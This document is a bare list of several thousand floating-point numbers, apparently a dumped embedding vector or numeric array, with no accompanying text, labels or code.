0.010929044336080551, -0.017551586031913757, -0.011705989949405193, 0.0059935855679214, -0.013807444833219051, 0.018646709620952606, 0.0020441084634512663, -0.0032298765145242214, 0.012860310263931751, 0.010196494869887829, 0.012579130008816719, 0.0004573808691930026, 0.007066511083394289, 0.00009376538946526125, -0.020511381328105927, -0.011720788665115833, 0.008450215682387352, -0.02205047383904457, -0.0022309457417577505, 0.0016371366800740361, -0.026593759655952454, 0.07417246699333191, -0.00818383414298296, -0.02705252915620804, -0.0072514982894063, -0.050582900643348694, -0.01547972857952118, -0.019549448043107986, -0.010662661865353584, -0.010226092301309109, -0.0017869763541966677, 0.007406887598335743, -0.013674253597855568, -0.031196242198348045, 0.046498384326696396, 0.0037348915357142687, -0.020585374906659126, 0.013755648396909237, -0.010625665076076984, 0.018750302493572235, 0.0037015939597040415, 0.0422658771276474, 0.018025152385234833, 0.009826520457863808, -0.024729089811444283, 0.008783192373812199, -0.00744388485327363, -0.019653040915727615, 0.011091833002865314, -0.02794046700000763, 0.009789522737264633, -0.0019331162329763174, -0.001806400017812848, -0.03948367014527321, -0.010322285816073418, -0.009264159016311169, -0.0058159977197647095, 0.005586613435298204, -0.00809503998607397, 0.0000611035866313614, 0.008058042265474796, -0.016944827511906624, -0.006759432144463062, -0.018543116748332977, -0.021902484819293022, 0.01722600869834423, 0.002219846472144127, 0.002793306717649102, -0.009463945403695107, -0.02023020014166832, 0.02212446928024292, 0.00917536485940218, 0.02693413570523262, 0.005512618459761143, 0.020777761936187744, -0.004879962187260389, 0.012675323523581028, 0.017033621668815613, -0.011380412615835667, -0.01294170506298542, -0.023663563653826714, 0.028310440480709076, -0.008043243549764156, 0.01731480285525322, 0.00913836807012558, -0.0015113453846424818, -0.0076066735200583935, 0.004258405417203903, 0.015376136638224125, -0.019934220239520073, -0.021650902926921844, 0.000784345727879554, -0.0041696117259562016, 0.03954286500811577, -0.0072625973261892796, -0.006407956592738628, 0.010033706203103065, 0.037056636065244675, 0.013785245828330517, -0.02227245829999447, -0.02308640256524086, 0.0008925632573664188, -0.01345966849476099, -0.0091457674279809, 0.012601328082382679, -0.000528600940015167, 0.010847649537026882, 0.007784261368215084, 0.015524125657975674, -0.023249192163348198, -0.0031891793478280306, 0.01821753941476345, 0.014665785245597363, 0.009515741840004921, -0.000784345727879554, -0.008398419246077538, 0.019638242200016975, -0.00020186728215776384, -0.0045136879198253155, 0.04034201055765152, 0.007954449392855167, -0.0073624905198812485, 0.005778999999165535, 0.007373590022325516, -0.035991109907627106, 0.002767408499494195, -0.009589736349880695, 0.013970233500003815, -0.0054793208837509155, -0.013008300215005875, 0.014613988809287548, -0.005753101781010628, 0.016101285815238953, 0.025543032214045525, 0.02390034683048725, 0.011935374699532986, -0.018735503777861595, -0.005412725731730461, -0.01817314326763153, 0.015834905207157135, 0.0001313409156864509, -0.008509411476552486, 0.0013735300162807107, 0.008931182324886322, 0.02681574411690235, 0.0230272077023983, 0.004040120635181665, -0.000717750343028456, 0.04046040028333664, -0.02108854055404663, 0.015716511756181717, -0.0027341109234839678, 0.00865740142762661, -0.030189910903573036, -0.027230115607380867, -0.007155304774641991, -0.0014613989042118192, 0.002293841214850545, 0.0024991771206259727, -0.01633806899189949, 0.013563261367380619, -0.017803167924284935, -0.016782039776444435, -0.016116084530949593, 0.009819121100008488, -0.01010770071297884, 0.012246152386069298, -0.003113334532827139, -0.016101285815238953, -0.004032720811665058, 0.005934389308094978, 0.011646794155240059, 0.026282981038093567, -0.003716392908245325, -0.0025398742873221636, -0.0009804321452975273, -0.013777846470475197, -0.004654278047382832, 0.0022771924268454313, -0.007510480470955372, 0.025395043194293976, -0.018054751679301262, -0.008035844191908836, -0.00046547403326258063, -0.018587514758110046, -0.02024499885737896, -0.027437301352620125, -0.023678362369537354, -0.025424640625715256, 0.014029429294168949, 0.01722600869834423, 0.01498396322131157, 0.006992516107857227, 0.016101285815238953, 0.00696661788970232, -0.010152097791433334, 0.0008329048869200051, 0.005664308089762926, -0.01737399771809578, 0.017803167924284935, 0.0036719960626214743, -0.021798891946673393, 0.027111724019050598, -0.0007306994521059096, 0.012357144616544247, 0.016900431364774704, -0.022657232359051704, 0.008716597221791744, -0.0007949824794195592, -0.010847649537026882, 0.02391514554619789, -0.013163689523935318, 0.023367583751678467, 0.0029819936025887728, -0.011654193513095379, -0.022908814251422882, -0.016027290374040604, -0.014088625088334084, -0.0011182476300746202, -0.021754495799541473, 0.01938665844500065, 0.0034925583750009537, -0.016930028796195984, 0.010174295864999294, -0.0018572715343907475, 0.022405650466680527, 0.0015890400391072035, 0.015686914324760437, 0.006459753029048443, 0.01818794198334217, 0.005904791411012411, 0.013274681754410267, -0.005845595616847277, -0.0060675800777971745, 0.027230115607380867, 0.02295321226119995, 0.013881439343094826, 0.021369721740484238, -0.001432725926861167, -0.01106963399797678, -0.004032720811665058, -0.016619250178337097, 0.0041881101205945015, 0.0009203113149851561, 0.0029227978084236383, -0.007159004919230938, -0.007521579507738352, 0.014525194652378559, 0.00553481699898839, -0.024388711899518967, -0.008383619599044323, -0.008820190094411373, -0.0032890725415199995, 0.00205705757252872, 0.01925346814095974, 0.009885716252028942, -0.0007515104953199625, 0.008435416035354137, 0.006208170671015978, -0.00773246493190527, 0.01345966849476099, 0.0163972657173872, -0.006848226301372051, -0.027674084529280663, -0.0047504715621471405, -0.002972744405269623, 0.00961933471262455, 0.011217623949050903, -0.01390363834798336, -0.00857600662857294, 0.0066336411982774734, -0.0011284219799563289, -0.012186956591904163, -0.004953957162797451, 0.005172241944819689, 0.0057235038839280605, 0.010625665076076984, -0.01741839572787285, 0.007170103956013918, -0.012305349111557007, 0.002808105666190386, -0.01547972857952118, 0.0035998509265482426, 0.01246813777834177, 0.015938498079776764, -0.01203156728297472, -0.008169034495949745, -0.010995639488101006, -0.015716511756181717, 0.0019405157072469592, -0.012682722881436348, -0.0042806039564311504, 0.010248291306197643, -0.022627634927630424, -0.007680668495595455, 0.004916959907859564, -0.009930113330483437, 0.005645809229463339, -0.00005402204260462895, 0.01635286770761013, 0.0011052985209971666, -0.01547972857952118, 0.02788127027451992, -0.0007912827422842383, 0.0023770856205374002, 0.02033379301428795, -0.004306502174586058, 0.0073513914830982685, -0.0029190981294959784, -0.01633806899189949, 0.005923290271311998, 0.007029513828456402, -0.006589244119822979, -0.006023183465003967, -0.0005401626112870872, -0.015198548324406147, 0.009278957732021809, -0.009419548325240612, 0.008716597221791744, -0.002569472184404731, 0.002974594244733453, 0.011979770846664906, -0.025750217959284782, -0.0008777642506174743, -0.011646794155240059, -0.03081146813929081, 0.012046366930007935, -0.020008215680718422, -0.013237684033811092, 0.003313120687380433, -0.0013365325285121799, 0.033090509474277496, -0.015908898785710335, 0.0037015939597040415, 0.0025435739662498236, -0.017107617110013962, -0.013496666215360165, -0.01296390313655138, -0.018084349110722542, -0.004672776907682419, -0.005331330932676792, 0.017033621668815613, -0.007332892622798681, -0.0058085983619093895, -0.025750217959284782, 0.003714543068781495, 0.027407703921198845, -0.010988240130245686, -0.012394142337143421, -0.015805305913090706, 0.015672115609049797, 0.01498396322131157, -0.004528486635535955, -0.006811228580772877, 0.00030361025710590184, -0.02222806215286255, 0.00648565124720335, -0.008509411476552486, -0.00695181917399168, -0.01747759059071541, 0.013748249039053917, 0.001504870830103755, 0.0021643503569066525, 0.012690122239291668, -0.0057198042050004005, 0.005401626229286194, 0.0075844754464924335, -0.03291292116045952, 0.017980756238102913, 0.0011117730755358934, -0.0026712152175605297, -0.0006266441196203232, 0.01935706101357937, 0.010055904276669025, -0.0016593352193012834, 0.03489598631858826, -0.012275750748813152, -0.028118055313825607, 0.01010030135512352, 0.006663239095360041, -0.0052314382046461105, 0.007085009943693876, -0.010300087742507458, 0.004361998289823532, -0.00773986428976059, -0.0021735995542258024, 0.026282981038093567, 0.004472990520298481, -0.0018415475497022271, 0.004202909301966429, 0.010980839841067791, 0.010344483889639378, -0.00965633150190115, 0.013807444833219051, -0.0017314802389591932, -0.016826435923576355, -0.001986762508749962, 0.0016926329117268324, 0.0005249012028798461, -0.008805390447378159, 0.01246813777834177, 0.004221408162266016, -0.018039951100945473, -0.005024252459406853, 0.015538925305008888, 0.009856117889285088, -0.012549531646072865, 0.011387811973690987, 0.008783192373812199, 0.021517710760235786, -0.021532509475946426, -0.003984624519944191, -0.013215485960245132, 0.0034370622597634792, -0.020836958661675453, -0.012386742979288101, -0.002216146793216467, -0.014769378118216991, -0.009382550604641438, -0.016974424943327904, -0.003925428260117769, -0.0001820967736421153, 0.008354022167623043, -0.02102934569120407, -0.01059606671333313, -0.03966125473380089, 0.0017647779313847423, 0.0005605111946351826, -0.004872562829405069, 0.017551586031913757, 0.016056889668107033, -0.019771432504057884, 0.018631910905241966, 0.003168830880895257, -0.004047519993036985, -0.04205869138240814, -0.008642601780593395, 0.005460822023451328, -0.0032687238417565823, 0.009042174555361271, 0.016693245619535446, -0.004317601211369038, 0.01547972857952118, 0.020585374906659126, -0.009293757379055023, 0.007680668495595455, 0.0047615705989301205, 0.010892046615481377, 0.015006162226200104, 0.007614073343575001, 0.00819123350083828, -0.01346706785261631, 0.006385758053511381, -0.009204963222146034, 0.0019756632391363382, 0.012371944263577461, 0.013370875269174576, -0.006796429865062237, 0.02684534341096878, 0.013481867499649525, -0.005560715217143297, 0.013689053244888783, 0.020910954102873802, -0.015672115609049797, 0.011883578263223171, 0.013666854240000248, -0.026238584890961647, -0.016663646325469017, -0.010255690664052963, 0.004003122914582491, 0.00011717782763298601, 0.02212446928024292, 0.02202087640762329, -0.013615057803690434, -0.000022025038560968824, -0.0022586937993764877, 0.00865740142762661, -0.01246813777834177, 0.001704657101072371, -0.011350814253091812, 0.026164589449763298, -0.010692260228097439, 0.0110770333558321, 0.003372316714376211, -0.011373013257980347, 0.005079748574644327, -0.015198548324406147, 0.024743888527154922, -0.022642433643341064, 0.024817882105708122, -0.012519934214651585, 0.0181435439735651, -0.007473482750356197, -0.002808105666190386, 0.02607579529285431, 0.0007713966188021004, -0.0024344315752387047, -0.004332400392740965, -0.0017879012739285827, -0.021650902926921844, 0.005353529471904039, -0.005220338702201843, 0.029153982177376747, 0.0364350788295269, 0.001609388622455299, 0.00035702530294656754, -0.005261036101728678, -0.01485077291727066, -0.023382382467389107, 0.0012125910725444555, -0.009478744119405746, -0.0007575225899927318, 0.03750060498714447, 0.001161719672381878, 0.007514180149883032, -0.01638246700167656, 0.011225023306906223, -0.02216886542737484, -0.002970894565805793, 0.009419548325240612, -0.0038403342477977276, -0.010137299075722694, -0.007932251319289207, 0.0006659539067186415, 0.04122994840145111, -0.007073910441249609, -0.0016214128118008375, 0.004731972701847553, 0.008243029937148094, -0.001914617489092052, 0.0063043637201189995, -0.006703936029225588, -0.02798486314713955, 0.001057201880030334, -0.011025236919522285, -0.014303210191428661, -0.0299531277269125, 0.0039513264782726765, -0.003988324198871851, -0.014687984250485897, 0.018646709620952606, -0.026208987459540367, 0.005864094477146864, 0.01642686314880848, 0.012320147827267647, 0.004776369780302048, -0.0015289192087948322, 0.00773246493190527, 0.007961848750710487, -0.010825451463460922, -0.016012491658329964, 0.01839512772858143, -0.036967843770980835, -0.010773655027151108, -0.00458768242970109, -0.0027470600325614214, -0.01716681197285652, -0.004084517247974873, 0.030263906344771385, -0.00695181917399168, 0.0016861583571881056, -0.003525855951011181, -0.017995554953813553, -0.017877163365483284, -0.007340291980654001, -0.009382550604641438, 0.00913836807012558, -0.02395954169332981, 0.017566384747624397, -0.004310201853513718, 0.008635202422738075, -0.01246813777834177, -0.029449962079524994, -0.007536378689110279, -0.006977717392146587, -0.007221900392323732, 0.0004224645090289414, -0.01499876193702221, -0.010344483889639378, 0.025720620527863503, -0.010018906556069851, 0.000018281938537256792, 0.015117154456675053, 0.006515249144285917, 0.01716681197285652, 0.0018341480754315853, 0.018913092091679573, -0.006589244119822979, 0.006896323058754206, -0.007462383713573217, -0.003237276105210185, 0.007491981610655785, 0.0013513314770534635, -0.004073418211191893, 0.024359114468097687, 0.010884647257626057, -0.0024288820568472147, -0.013089694082736969, -0.020452184602618217, 0.004924359265714884, 0.010781054385006428, 0.0062969643622636795, 0.015242945402860641, -0.012638325802981853, -0.0012930604862049222, -0.003133683232590556, -0.014355006627738476, -0.0012597627937793732, -0.026120193302631378, 0.0023678361903876066, -0.0035277060233056545, -0.008982978761196136, 0.0081986328586936, 0.019934220239520073, -0.021754495799541473, 0.006315463222563267, 0.007380989380180836, -0.014769378118216991, -0.020452184602618217, 0.023515572771430016, 0.013370875269174576, 0.010226092301309109, -0.009256759658455849, -0.00009694485197542235, 0.006167473271489143, -0.008709197863936424, -0.010625665076076984, 0.019445855170488358, -0.008280026726424694, 0.005201840307563543, -0.006718735210597515, 0.005597712937742472, 0.000783420808147639, 0.041821908205747604, 0.027156122028827667, -0.0026138692628592253, 0.006814928725361824, 0.007910052314400673, 0.00724779861047864, 0.010300087742507458, -0.0022050475236028433, -0.00003008932435477618, 0.0026009201537817717, 0.023485975340008736, -0.0052351378835737705, 0.030367499217391014, -0.008028444834053516, -0.004125214647501707, -0.018010353669524193, 0.0029912430327385664, 0.0193126630038023, 0.0024769785813987255, -0.015124553814530373, 0.012416341342031956, 0.010662661865353584, 0.0071294065564870834, -0.013289480470120907, -0.02788127027451992, -0.009767324663698673, 0.009116169065237045, 0.022894015535712242, 0.00913836807012558, -0.00007226062734844163, 0.00348330894485116, 0.017758771777153015, -0.020836958661675453, 0.02683054283261299, -0.018099147826433182, -0.0015400184784084558, -0.02111813984811306, -0.013770447112619877, -0.0046690767630934715, 0.02104414440691471, 0.025661423802375793, -0.03288332372903824, 0.029287174344062805, 0.005212939344346523, -0.008635202422738075, -0.011210224591195583, 0.0027489098720252514, -0.001027603866532445, 0.002837703563272953, 0.00601578364148736, -0.008169034495949745, -0.017507188022136688, -0.025765016674995422, -0.004310201853513718, 0.006385758053511381, -0.0003514756972435862, -0.002349337562918663, 0.010618265718221664, 0.01055906992405653, -0.0329425223171711, -0.009907914325594902, -0.026120193302631378, -0.002216146793216467, -0.002401133766397834, 0.0019738133996725082, 0.023648763075470924, -0.01058866735547781, -0.015672115609049797, -0.009049573913216591, -0.0014447499997913837, 0.0008065442088991404, -0.008428016677498817, -0.023574769496917725, -0.022820021957159042, -0.011720788665115833, 0.0005739228217862546, -0.017965957522392273, -0.0026878640055656433, -0.010899445973336697, 0.015494528226554394, 0.012423740699887276, -0.004624680150300264, -0.0026897138450294733, -0.015102354809641838, -0.004891061689704657, -0.0019201671238988638, -0.006611442659050226, -0.009663731791079044, -0.0033926651813089848, -0.011824381537735462, -0.004913260228931904, -0.008797991089522839, -0.029583152383565903, 0.000425933045335114, 0.00004173773777438328, 0.016930028796195984, -0.0005212014657445252, 0.007406887598335743, -0.02873961254954338, 0.013837042264640331, -0.011498804204165936, 0.017773570492863655, 0.0018924190662801266, -0.00744018517434597, -0.0011404460528865457, 0.00808764062821865, -0.014917368069291115, -0.008968179114162922, -0.022435247898101807, -0.01919427141547203, 0.010818051174283028, -0.00964153278619051, -0.009841319173574448, -0.004839265253394842, 0.02893199771642685, 0.0049983542412519455, 0.0038736320566385984, 0.02028939686715603, 0.036168698221445084, -0.003585051978006959, -0.0012051915982738137, 0.00362574914470315, 0.006703936029225588, -0.023811552673578262, 0.0005766975809819996, -0.008627803064882755, -0.001197792124003172, 0.0073624905198812485, 0.0021292027086019516, 0.004476690199226141, -0.03258734568953514, -0.011920575052499771, -0.011395211331546307, -0.013592859730124474, -0.021547310054302216, 0.0012153659481555223, 0.006848226301372051, 0.021769294515252113, -0.010995639488101006, 0.005656908731907606, -0.005623611155897379, 0.013230284675955772, 0.017063219100236893, -0.003895830363035202, 0.024640295654535294, 0.007680668495595455, 0.018853895366191864, 0.002702662954106927, -0.013311679475009441, -0.0171964094042778, 0.005505219101905823, -0.010522072203457355, 0.006267366465181112, -0.014784176833927631, -0.008709197863936424, -0.010048504918813705, 0.0073624905198812485, -0.003610950196161866, 0.023397181183099747, -0.017004024237394333, -0.02489187754690647, -0.010388880968093872, -0.011654193513095379, 0.019845426082611084, 0.011950173415243626, -0.008435416035354137, -0.001403127913363278, -0.004265804775059223, -0.002593520563095808, 0.002247594529762864, 0.004857764113694429, 0.02413713000714779, -0.0023659863509237766, -0.013282081112265587, -0.016708044335246086, -0.01835072971880436, 0.0329425223171711, 0.011587598361074924, 0.0065448470413684845, -0.0081986328586936, 0.007902652956545353, -0.007984047755599022, 0.002151401247829199, -0.009974509477615356, -0.02884320542216301, 0.014939566142857075, -0.016574854031205177, -0.008775793015956879, -0.0018554215785115957, 0.019549448043107986, -0.0021088540088385344, -0.0028118055779486895, 0.003283522790297866, 0.014347607269883156, 0.006330261938273907, 0.01817314326763153, 0.021784093230962753, -0.0019997116178274155, -0.0019368160283192992, 0.011210224591195583, -0.012616126798093319, -0.007747264113277197, -0.024773485958576202, 0.00906437262892723, 0.02126612886786461, 0.005545916501432657, -0.020422587171196938, -0.0023659863509237766, 0.01619007997214794, 0.018587514758110046, 0.02033379301428795, -0.003129983553662896, -0.0023807852994650602, -0.011003038845956326, 0.01635286770761013, -0.005464522168040276, -0.013111893087625504, 0.006711335852742195, -0.004080817569047213, 0.009848718531429768, -0.008953380398452282, -0.006252567283809185, -0.015494528226554394, -0.003416713560000062, -0.024225924164056778, 0.006981417071074247, -0.018543116748332977, -0.009819121100008488, -0.014909968711435795, 0.006981417071074247, -0.012926905415952206, -0.005693905986845493, -0.014843372628092766, 0.013622457161545753, -0.0018618961330503225, 0.01155799999833107, -0.026578960940241814, -0.006592943798750639, -0.008043243549764156, -0.008812790736556053, 0.018750302493572235, 0.0031558817718178034, -0.0068815238773822784, 0.0024529302027076483, -0.006271066144108772, -0.011173226870596409, 0.0015862652799114585, -0.015390935353934765, -0.018498720601201057, 0.01912027783691883, -0.013652055524289608, -0.0009152241982519627, -0.007377289701253176, -0.006585544440895319, -0.03371206670999527, -0.006914821453392506, -0.008531609550118446, -0.040815576910972595, 0.0024473806843161583, 0.010795853100717068, -0.004628379829227924, -0.003921728581190109, 0.009323354810476303, -0.022834820672869682, 0.006737234070897102, 0.021369721740484238, -0.00031794674578122795, 0.012231353670358658, -0.006215570028871298, -0.0024399810936301947, 0.009449146687984467, 0.0041696117259562016, -0.01487297099083662, -0.0101298987865448, 0.012283150106668472, -0.011432209052145481, -0.00001497240191383753, -0.013222885318100452, -0.004883662331849337, -0.006200770847499371, 0.03536955267190933, 0.014051628299057484, 0.017877163365483284, 0.010418479330837727, -0.0005586613551713526, -0.011728188954293728, 0.006374659016728401, 0.004461891483515501, -0.01485077291727066, 0.014532594941556454, -0.008864587172865868, 0.017063219100236893, -0.013274681754410267, -0.009789522737264633, -0.006885223556309938, 0.004043820314109325, 0.018883492797613144, -0.009197563864290714, 0.0012366394512355328, -0.004609880968928337, 0.017107617110013962, 0.015020960941910744, -0.019697437062859535, 0.0071072084829211235, -0.014162620529532433, 0.018661508336663246, 0.014473398216068745, 0.006145274732261896, -0.00810983870178461, 0.01246813777834177, -0.015028360299766064, 0.0071072084829211235, 0.005024252459406853, -0.006367259658873081, -0.0015825654845684767, 0.012260952033102512, 0.0015751660102978349, -0.007188602816313505, 0.01441420242190361, -0.009019975550472736, 0.012919506058096886, 0.007417986635118723, 0.007462383713573217, 0.015790507197380066, 0.003818135941401124, 0.03391925245523453, -0.011972371488809586, -0.006074979901313782, -0.0044211940839886665, 0.00429540267214179, -0.020555777475237846, 0.017640380188822746, -0.001503020990639925, -0.017714373767375946, 0.00010584736446617171, 0.020466983318328857, 0.03640548139810562, -0.0003278898075222969, -0.022361252456903458, 0.009101370349526405, 0.01737399771809578, 0.021606504917144775, -0.006851925980299711, 0.01106223464012146, -0.0020293095149099827, 0.01402202993631363, -0.0030337900388985872, 0.0019275665981695056, -0.0058233970776200294, -0.0046653770841658115, -0.014281012117862701, 0.013689053244888783, 0.021591706201434135, 0.002660115947946906, -0.010980839841067791, 0.015834905207157135, 0.022302057594060898, 0.00014244014164432883, 0.018720705062150955, -0.001059051719494164, -0.030367499217391014, 0.0012875109678134322, 0.028058858588337898, 0.0027174619026482105, 0.0006479176809079945, -0.02116253599524498, 0.010440677404403687, -0.008857186883687973, 0.008775793015956879, -0.010307487100362778, -0.00348330894485116, -0.01499876193702221, 0.0065448470413684845, -0.006711335852742195, 0.013748249039053917, -0.006652139592915773, 0.009486143477261066, -0.004828165750950575, 0.024270320311188698, 0.008028444834053516, 0.011299018748104572, 0.005860394332557917, -0.0009647082770243287, 0.014236615039408207, 0.0014410503208637238, -0.037115830928087234, -0.00867220014333725, 0.009412148967385292, 0.00647825188934803, -0.0018230489222332835, -0.01728520356118679, -0.015716511756181717, 0.0005253636627458036, -0.00600098492577672, -0.009848718531429768, -0.003958726301789284, 0.021562108770012856, 0.010411079972982407, 0.024536702781915665, -0.0005188891082070768, 0.0015483428724110126, -0.013822243548929691, 0.014946965500712395, -0.0057161045260727406, -0.004376797005534172, -0.006863025017082691, 0.0006590168923139572, 0.01012249942868948, 0.014650986529886723, 0.011225023306906223, -0.005323931574821472, 0.0013383823679760098, 0.002637917408719659, -0.010314886458218098, -0.009256759658455849, 0.012653124518692493, 0.0021255030296742916, -0.008539008907973766, 0.010514672845602036, 0.005682806950062513, -0.008176433853805065, -0.016708044335246086, -0.010366682894527912, 0.0010988239664584398, -0.0020385589450597763, -0.0034204134717583656, -0.02771848253905773, 0.009974509477615356, 0.008990378119051456, 0.015923697501420975, -0.02392994426190853, 0.003888431005179882, 0.027422502636909485, -0.037855781614780426, -0.032261766493320465, -0.0100929019972682, 0.0030874363146722317, -0.009256759658455849, 0.0023770856205374002, 0.0202597975730896, 0.009108769707381725, 0.005586613435298204, 0.010921644046902657, -0.0035998509265482426, -0.00037159305065870285, -0.0033871156629174948, 0.013089694082736969, -0.00063311867415905, -0.00906437262892723, -0.0021070041693747044, 0.000800532114226371, -0.01721120998263359, 0.00011717782763298601, 0.002893199911341071, 0.004461891483515501, 0.013245083391666412, 0.02027459815144539, -0.015087556093931198, -0.02592780627310276, -0.012320147827267647, -0.033149708062410355, 0.004443392623215914, 0.003760789753869176, 0.007806459907442331, -0.010499873198568821, -0.00017585346358828247, -0.015731312334537506, 0.01058866735547781, 0.005031651817262173, 0.011291618458926678, -0.004487789701670408, 0.02017100527882576, -0.004154812544584274, 0.005904791411012411, 0.013948035426437855, -0.010869847610592842, 0.03489598631858826, 0.02965714782476425, -0.013666854240000248, -0.002943146275356412, -0.03747100755572319, 0.00428430363535881, 0.017743973061442375, 0.00867220014333725, -0.011262021027505398, -0.005756801925599575, -0.04048999771475792, 0.005261036101728678, 0.011661592870950699, -0.028576822951436043, 0.0010100301587954164, -0.004635779187083244, 0.0018720704829320312, -0.019075879827141762, 0.018513519316911697, 0.0016325120814144611, 0.01010030135512352, 0.0037959374021738768, -0.02021540142595768, 0.0145029965788126, -0.0007612223271280527, 0.011350814253091812, -0.008050642907619476, -0.024714289233088493, 0.01489516906440258, 0.013711251318454742, -0.0037385914474725723, 0.009574937634170055, -0.007510480470955372, -0.036168698221445084, 0.009900514967739582, -0.005775300320237875, 0.026342177763581276, -0.009848718531429768, 0.003113334532827139, 0.02129572629928589, -0.004798567853868008, 0.009967110119760036, -0.006759432144463062, 0.004476690199226141, -0.013267282396554947, 0.002974594244733453, -0.006348760798573494, -0.001091424492187798, 0.01495436578989029, -0.01926826685667038, 0.0014225515769794583, -0.015228146687150002, -0.007806459907442331, 0.00429170299321413, 0.00040350333438254893, 0.017033621668815613, -0.016737641766667366, -0.014295810833573341, -0.010766254737973213, 0.0091457674279809, 0.003921728581190109, -0.014643587172031403, -0.0047689699567854404, -0.003973525017499924, -0.0030800369568169117, 0.014465998858213425, -0.005372028332203627, 0.0011543200816959143, -0.009952311404049397, 0.02489187754690647, -0.017033621668815613, 0.004054919350892305, -0.030263906344771385, 0.025321047753095627, -0.004158512223511934, -0.01935706101357937, -0.003276123432442546, 0.01627887412905693, -0.004017922095954418, -0.007747264113277197, -0.017640380188822746, -0.029405565932393074, 0.011898376978933811, -0.020896153524518013, 0.001570541295222938, -0.007806459907442331, 0.010825451463460922, 0.008383619599044323, 0.011284219101071358, 0.022376051172614098, 0.00809503998607397, -0.009182765148580074, 0.014539994299411774, 0.023485975340008736, 0.013703851960599422, 0.006271066144108772, 0.014576991088688374, 0.00299864262342453, -0.0038403342477977276, 0.013652055524289608, 0.023441577330231667, 0.005975086707621813, 0.021473314613103867, -0.0001275255490327254, 0.013311679475009441, 0.02390034683048725, -0.008894184604287148, 0.010795853100717068, 0.004336100071668625, 0.009441746398806572, 0.00035101320827379823, 0.0019294165540486574, 0.0161752812564373, 0.012764116749167442, 0.022834820672869682, 0.00906437262892723, -0.003884731326252222, 0.0008759144111536443, 0.0018313733162358403, 0.002395584248006344, 0.0009600835619494319, 0.0075844754464924335, 0.0010978990467265248, -0.007003615610301495, 0.005627310834825039, 0.009989309124648571, -0.0193126630038023, 0.01650085859000683, -0.003309421008452773, 0.001298610121011734, 0.012223954312503338, -0.022672031074762344, 0.01846912130713463, 0.011291618458926678, 0.0038403342477977276, -0.013726050034165382, -0.008783192373812199, -0.00035332556581124663, 0.01826193742454052, 0.006074979901313782, -0.02683054283261299, -0.017581183463335037, -0.018868694081902504, 0.0024344315752387047, 0.0002019828971242532, -0.004032720811665058, -0.0000112798834379646, -0.012712320312857628, -0.002591670723631978, -0.006940719671547413, -0.0008449290180578828, -0.014140421524643898, 0.03276493400335312, -0.0004423506325110793, 0.002834003884345293, 0.02486228011548519, 0.01718161068856716, -0.015390935353934765, 0.009471344761550426, 0.007521579507738352, 0.02802926115691662, -0.0057161045260727406, -0.008716597221791744, 0.0006627166294492781, -0.006829727441072464, 0.0015242944937199354, -0.03770779073238373, 0.015302141197025776, -0.01832113228738308, -0.002695263596251607, 0.009804321452975273, 0.016589652746915817, -0.008450215682387352, 0.012815913185477257, -0.023841150104999542, 0.007514180149883032, 0.012897307984530926, 0.019505050033330917, 0.0192386694252491, 0.004646878689527512, -0.0028858003206551075, 0.005756801925599575, 0.006914821453392506, 0.006666938774287701, 0.006137875374406576, 0.01846912130713463, -0.007281096186488867, 0.003921728581190109, -0.015065358020365238, -0.006178572308272123, -0.014429002068936825, 0.017684776335954666, 0.01835072971880436, -0.0030837366357445717, -0.02301240712404251, 0.01390363834798336, 0.019904622808098793, 0.006219269707798958, -0.010440677404403687, -0.02009700983762741, 0.01833593100309372, -0.020970148965716362, -0.007562276907265186, -0.010300087742507458, 0.0019201671238988638, -0.00964893214404583, 0.009367751888930798, -0.023574769496917725, 0.008272627368569374, 0.005072349216789007, 0.01106963399797678, 0.010292687453329563, 0.0309002622961998, 0.016856033354997635, 0.0010137298377230763, -0.015390935353934765, 0.009597135707736015, 0.025617027655243874, -0.0012347896117717028, -0.009508342482149601, -0.015228146687150002, 0.005801198538392782, 0.005664308089762926, 0.006807528901845217, 0.018498720601201057, 0.020718567073345184, 0.005986185744404793, -0.013052697293460369, -0.02114773727953434, 0.014281012117862701, 0.003198428777977824, 0.02123653143644333, 0.02592780627310276, -0.005090847611427307, -0.009685929864645004, -0.004384196829050779, -0.004613580647855997, -0.0045173875987529755, 0.002957945456728339, 0.010181695222854614, -0.011927974410355091, 0.02200607769191265, 0.021650902926921844, -0.0020866557024419308, 0.014665785245597363, 0.01057386863976717, -0.0070221140049397945, 0.00252877501770854, 0.019460653886198997, 0.016574854031205177, 0.014177419245243073, 0.010418479330837727, -0.010670062154531479, -0.020422587171196938, 0.019460653886198997, 0.006985116750001907, 0.00865740142762661, 0.012283150106668472, -0.003586901817470789, -0.018483921885490417, 0.015672115609049797, 0.000649305060505867, 0.025217454880475998, 0.006555946543812752, 0.008257828652858734, -0.009552739560604095, 0.0006335811922326684, 0.014273612760007381, 0.026712151244282722, -0.00041275270632468164, -0.0017185311298817396, -0.001570541295222938, 0.013215485960245132, -0.012682722881436348, -0.012741918675601482, 0.020836958661675453, 0.003851433517411351, -0.015272543765604496, -0.0026064696721732616, -0.004609880968928337, 0.0017453542677685618, 0.0095453392714262, -0.004709774162620306, -0.004443392623215914, 0.02108854055404663, 0.017655178904533386, -0.01824713684618473, 0.0032483753748238087, -0.0007945200195536017, -0.007954449392855167, -0.0029264974873512983, -0.0008569532074034214, 0.006430155131965876, 0.0023345383815467358, -0.011876177974045277, 0.018572714179754257, -0.013585460372269154, 0.007910052314400673, -0.01636766828596592, -0.0034870088566094637, 0.004154812544584274, 0.004450791981071234, -0.0039402274414896965, -0.02221326343715191, -0.0201858039945364, 0.020008215680718422, -0.014458599500358105, 0.00696661788970232, -0.025261852890253067, -0.002153251087293029, -0.01833593100309372, 0.008650001138448715, 0.012771516107022762, 0.004976155702024698, -0.0029523957055062056, 0.001403127913363278, -0.02101454697549343, 0.0021902485750615597, 0.015864502638578415, 0.015494528226554394, 0.007388388738036156, 0.004791168496012688, -0.004591382574290037, 0.002458479953929782, -0.023382382467389107, 0.005175942089408636, 0.012867709621787071, 0.005146343726664782, 0.00456548435613513, 0.008383619599044323, -0.0015760909300297499, 0.00962673407047987, 0.011498804204165936, 0.01495436578989029, 0.010662661865353584, -0.018868694081902504, -0.006134175695478916, 0.006811228580772877, 0.004535885993391275, -0.012823312543332577, -0.005712404847145081, -0.013511464931070805, -0.006182272452861071, 0.0002878863306250423, -0.014717581681907177, -0.0009517591679468751, -0.0120241679251194, 0.024433109909296036, 0.0008398419013246894, 0.0073624905198812485, 0.021650902926921844, 0.013015699572861195, 0.012741918675601482, -0.009915313683450222, -0.01620487868785858, 0.010677461512386799, -0.014429002068936825, -0.0032964718993753195, -0.005619911011308432, -0.014569591730833054, -0.04114115238189697, -0.006082379259169102, 0.005446023307740688, -0.007680668495595455, 